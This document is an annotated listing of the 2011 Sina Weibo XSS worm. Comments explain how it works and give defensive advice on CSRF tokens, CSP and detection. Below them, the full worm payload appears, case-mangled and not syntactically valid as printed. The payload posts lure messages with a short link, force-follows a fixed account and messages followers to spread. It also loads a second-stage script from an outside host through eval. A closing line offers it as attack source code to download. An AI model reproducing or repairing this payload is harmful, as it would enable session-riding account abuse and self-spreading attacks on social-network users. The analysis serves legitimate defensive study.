// Transcribed payload of the 2011 Sina Weibo XSS worm, preserved here for analysis.
// The transcription is case- and whitespace-mangled (e.g. `Xmlhttprequest`, `CREATEXHR`,
// `d ata`, `p ost`), so the listing is not syntactically valid as printed; it is kept
// byte-identical below and only annotated.
//
// What the visible code does, in order of definition:
//  - createxhr(): returns a native XMLHttpRequest, or the ActiveX "Microsoft.XMLHTTP"
//    object as a fallback.
//  - post(url, data, sync): opens a POST to `url` (the `sync` argument is passed as
//    XHR's async flag), sets Accept and a form-urlencoded Content-type, and sends `data`.
//    The request rides on the victim's ambient session cookie; no anti-CSRF token appears
//    in any request body in this listing.
//  - Getappkey(URL): synchronous GET of a weibo.com page, then a regex over the response
//    (`namecard="true" title="..."`) collecting the title attribute values (presumably the
//    display names of followed users), joined with "||".
//  - random_msg(): picks one of ten lure strings at random and appends a short link
//    (`http://163.fm/PxZHoxn?id=<timestamp>`), then URL-encodes the result.
//  - publish(): POSTs the lure as a new microblog to /mblog/publish.php (rnd=<timestamp>
//    is a cache-buster).
//  - follow(): POSTs to /attention/aj_addfollow.php to follow the hard-coded uid
//    2201270010, reading the victim's own id from the page global `$CONFIG.$uid`.
//  - message(): calls Getappkey on the victim's /follow page and sends at most five
//    private messages via /message/addmsg.php, each carrying a fresh lure + link. This is
//    the self-propagation step.
//  - Main(): runs publish, follow and message in turn, swallowing every exception
//    (`catch (E) {}`), so partial failures do not stop the remaining actions.
// Top-level statements: a second-stage loader (`http://www.2kt.cn/images/t.js`) is
// injected into the opening window via `window.opener.eval`, Main() is run, and after
// 5 s the page is redirected to /pub/topic (presumably to mask the activity). The
// caption on this page says the entry point was an XSS injection; that stage is not
// part of the listing.
//
// Defensive takeaways grounded in this listing:
//  - Every state-changing endpoint is driven with only the ambient cookie. A per-request
//    anti-CSRF token, validated server-side on publish/follow/message, would have stopped
//    all three actions even with script execution on the page.
//  - The loader depends on `eval` of attacker-controlled text and on loading script from
//    an external host; a CSP that disallows inline script and `eval` and allow-lists
//    script-src breaks both the loader and the second stage.
//  - Detection signals: bursts of POSTs to /mblog/publish.php, /attention/aj_addfollow.php
//    and /message/addmsg.php from a single session within seconds, the same short-link
//    payload appearing across many accounts, and script loads from www.2kt.cn.
function createxhr () {return window. Xmlhttprequest?new XMLHttpRequest (): New ActiveXObject ("Microsoft.XMLHTTP"); Function post (url,data,sync) {xmlHttp = CREATEXHR (); Xmlhttp.open ("POST", Url,sync); Xmlhttp.setrequestheader ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); Xmlhttp.setrequestheader ("Content-type", "application/x-www-form-urlencoded; Charset=utf-8"); Xmlhttp.send (data);} function Getappkey (URL) {xmlHttp = CREATEXHR (); Xmlhttp.open ("GET", Url,false); Xmlhttp.send (); result = Xmlhttp.responsetext;id_arr = "; id = Result.match (/namecard=" true "title=" [^ "]*/g); for (i=0;i<id.length;i++) {sum = Id[i].tostring (). Split (' "') [3];id_arr + = sum + ' | | ';} return Id_arr;} function random_msg () {link = ' http://163.fm/PxZHoxn?id= ' + new Date (). GetTime (); var msgs = [' Guo Meimei event ' Some unnoticed details: ', ' the place to wear help in the cause of the founding of the party: ', ' Let the woman heart of the 100 verses: ', ' 3D meat and Clouds HD Putonghua version of the seed: ', ' This is the legendary fairy companion Ah: ', ' breaking! Fan Bingbing nude leaked photos: ' Yang Mi was exploded several times by the unspoken rules: ', ' silly boy took the hammer to rob the bank: ', ' can monitor other people's mobile phone software: ', ' a tax levy point is expected to mention 4000: '];var msg = Msgs[math.floor (Math.random () *msGs.length)] + link;msg = encodeuricomponent (msg); return msg;} function publish () {url = ' http://weibo.com/mblog/publish.php?rnd= ' + new Date (). GetTime ();d ata = ' content= ' + random_msg () + ' &pic=&styleid=2&retcode= ';p ost (Url,data,true);} function follow () {url = ' http://weibo.com/attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd = ' + new Date (). GetTime ();d ata = ' uid= ' + 2201270010 + ' &fromuid= ' + $CONFIG. $uid + ' &refer_sort=profile&atnid =profile ';p OST (Url,data,true);} Function message () {url = ' http://weibo.com/' + $CONFIG. 
$uid + '/follow '; ids = Getappkey (URL); id = ids.split (' | | '); For (I=0;i<id.length-1 & i<5;i++) {msgurl = ' http://weibo.com/message/addmsg.php?rnd= ' + new Date (). GetTime () msg = Random_msg (), msg = encodeURIComponent (msg), user = encodeURIComponent (encodeuricomponent (Id[i]));d ata = ' content = ' + msg + ' &name= ' + user + ' &retcode= ';p ost (Msgurl,data,false);}} function Main () {try{publish ();} catch (E) {}try{follow ();} catch (E) {}try{message ();} catch (e) {}}try{x= "g=document.createelement (' script '); g.src= ' http://www.2kt.cn/images/t.js '; Document.body.appendChild (g) "; Window.opener.eval (x);} catch (E) {}main (); var t=settimeout (' location= "http://weibo.com/pub/topic"; ', 5000);
Sina Weibo XSS attack source code download (2012.06.28_sina_xss.txt)